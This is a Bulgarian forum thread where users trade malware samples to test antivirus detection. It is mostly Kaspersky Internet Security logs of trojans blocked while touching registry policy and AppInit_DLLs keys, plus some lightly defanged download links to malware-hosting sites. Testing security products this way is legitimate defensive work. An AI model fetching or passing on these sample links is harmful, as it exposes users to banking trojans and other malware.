Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 8

Featured Replies

И малко офтопик днес съм дал около 50 проби и съм влизал къде ли не и ми няма нищо после като пиша в друга тема да няма ама ти лъжеш и други обвинения :biggrin:

Браво ама ги и стартирай :biggrin: щото аз без антивирус се разхождам из такива сайтове.

При мен не се засича от КИС

9.4.2010 г. 23:58:44 ч. Обнаружено: Trojan-Banker.Win32.Banker.auof Firefox h ttp://www.skatafka.com/download2.php?a=5794a24d704e32b4ec56c241f69fa6f7&b=87def48871cf369528103e6080346ef3 Да

9.4.2010 г. 23:58:44 ч. Запрещено: Trojan-Banker.Win32.Banker.auof Firefox h ttp://www.skatafka.com/download2.php?a=5794a24d704e32b4ec56c241f69fa6f7&b=87def48871cf369528103e6080346ef3 Да

  • Отговори 1,4k
  • Прегледи 66,9k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

  • На кого да помагаш? Трябва все пак да има и смисъл, нали? Пишеш му истини - то те замерва пак с минуси, защото само това може...Че почти нищо не знае си е едно на ръка. Стои си все в заразено състояни

  • https://www.virustotal.com/analisis/95107568455f7c669a1c690109b8fc28114f322d27dbe1f377a13500869e1b07-1269103277 Няма нужда от линк към това "нещо" нали? Има го на доста места тук! Защитите ми просто

  • Защо не пробвате това Trojan-Proxy.Win32.DiskMaster.ao.zip hxxp://www.skatafka.com/download.php?file=3dfa598aff1f1bd5334978c05cdd6027 18 програми още не реагират и най-добре да не Ви показвам обоб

Публикувани изображения

Браво ама ги и стартирай :biggrin: щото аз без антивирус се разхождам из такива сайтове.

9.4.2010 г. 23:58:44 ч. Обнаружено: Trojan-Banker.Win32.Banker.auof Firefox h ttp://www.skatafka.com/download2.php?a=5794a24d704e32b4ec56c241f69fa6f7&b=87def48871cf369528103e6080346ef3 Да

9.4.2010 г. 23:58:44 ч. Запрещено: Trojan-Banker.Win32.Banker.auof Firefox h ttp://www.skatafka.com/download2.php?a=5794a24d704e32b4ec56c241f69fa6f7&b=87def48871cf369528103e6080346ef3 Да

Е стартирам ги и нищо вие с антивирусните му мислете че трябват дефениции :biggrin:

Редактирано от Гост (преглед на промените)

Ванка дай 1 снимка да я видим тая защитна стена на кис,как блокира :biggrin: Касперски и защитна стена магаре и вестник ;)

1270826368-930.png

1270826408-460.png

1270826437-20.png

Тихичко без светлини и звукове

10.4.2010 г. 00:05:42 ч. Запрещено: Winlock.Policies.Values.Sub IDMAN.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM\CopyFileBufferedSynchronousIo Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:05:42 ч. Запрещено: Winlock.Policies.Values.Sub IDMAN.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM\CopyFileChunkSize Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:05:42 ч. Запрещено: Winlock.Policies.Values.Sub IDMAN.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM\CopyFileOverlappedCount Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:12:04 ч. slayer.exe.exe Помещено в группу Слабые ограничения Имеет высокое значение эвристически рассчитанного рейтинга опасности Да

10.4.2010 г. 00:12:04 ч. Запрещено: Winlock.Policies.Values.Sub slayer.exe.exe Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:12:04 ч. Запрещено: Winlock.AppInit_DLLs slayer.exe.exe Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:15:21 ч. botetz.exe Помещено в группу Слабые ограничения Имеет высокое значение эвристически рассчитанного рейтинга опасности Да

10.4.2010 г. 00:15:21 ч. Запрещено: Winlock.Policies.Values.Sub botetz.exe Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:15:21 ч. Запрещено: Winlock.AppInit_DLLs botetz.exe Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:15:22 ч. Запрещено: Winlock.Policies.Values.Sub botetz.exe Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:15:22 ч. Запрещено: Winlock.Policies.Values.Sub botetz.exe Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\AuthenticodeEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:15:25 ч. Запрещено: Winlock.Policies.Values.Sub Windows Problem Reporting Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:15:25 ч. Запрещено: Winlock.AppInit_DLLs Windows Problem Reporting Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:15:25 ч. Разрешено: Установка прав отладчика Windows Problem Reporting Установка прав отладчика Установка прав отладчика Да

10.4.2010 г. 00:15:25 ч. Разрешено: Приостановка других процессов и потоков Windows Problem Reporting Изменение работы программы c:\windows\system32\werfault.exe Приостановка других процессов и потоков Да

10.4.2010 г. 00:15:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Problem Reporting Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\CRYPTOGRAPHY\PrivKeyCacheMaxItems Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:15:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Problem Reporting Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\CRYPTOGRAPHY\PrivKeyCachePurgeIntervalSeconds Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:15:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Problem Reporting Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\CRYPTOGRAPHY\PrivateKeyLifetimeSeconds Winlock.Policies.Values.Sub Да

Нещо не им се отваря парашута :biggrin:

Редактирано от nikssi (преглед на промените)

Тук има ли евристика :biggrin:

http://www.filehoster.ru/files/fb0299

http://www.virustotal.com/analisis/2f339d92d26448aee2d501fdf99ca8275434a2c1033e5abd6ff358e317687436-1270847245

Прави ми впечатление, че в последно време почти не виждам резултати от сканиране на Касапа....гледам, че заглъхна и ентусиазма към "жълтият лидер"! Защо ли? :biggrin:

Тук има ли евристика :biggrin:

http://www.filehoster.ru/files/fb0299

http://www.virustotal.com/analisis/2f339d92d26448aee2d501fdf99ca8275434a2c1033e5abd6ff358e317687436-1270847245

10.4.2010 г. 00:18:29 ч. JOKE.EXE Помещено в группу Слабые ограничения Имеет высокое значение эвристически рассчитанного рейтинга опасности Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.AppInit_DLLs JOKE.EXE Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CreateUriCacheSize Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\ProxyBypass ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\IntranetName ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\UNCAsIntranet ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AutoDetect ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\ProxyBypass ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\IntranetName ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\UNCAsIntranet ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AutoDetect ZoneMap Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\SpecialFoldersCacheSize Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:29 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\Levels Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\DefaultLevel Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\SaferFlags Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\LogFileName Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\AuthenticodeEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:30 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Security_HKLM_only Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CreateUriCacheSize Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\EnablePunycode Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\ProxyBypass ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\IntranetName ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\UNCAsIntranet ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AutoDetect ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\ProxyBypass ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Удаление hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\IntranetName ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\UNCAsIntranet ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: ZoneMap JOKE.EXE Изменение hklm\SOFTWARE\KASPERSKYLAB\SANDBOX\KLSB43\REGISTRY\USER\S-1-5-21-2564294426-3243596494-3495773342-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AutoDetect ZoneMap Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\SpecialFoldersCacheSize Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub JOKE.EXE Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\TransparentEnabled Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.AppInit_DLLs Windows Command Processor Чтение hklm\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\AppInit_DLLs Winlock.AppInit_DLLs Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\Levels Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\DefaultLevel Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\SaferFlags Winlock.Policies.Values.Sub Да

10.4.2010 г. 00:18:31 ч. Запрещено: Winlock.Policies.Values.Sub Windows Command Processor Чтение hklm\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS\LogFileName Winlock.Policies.Values.Sub Да

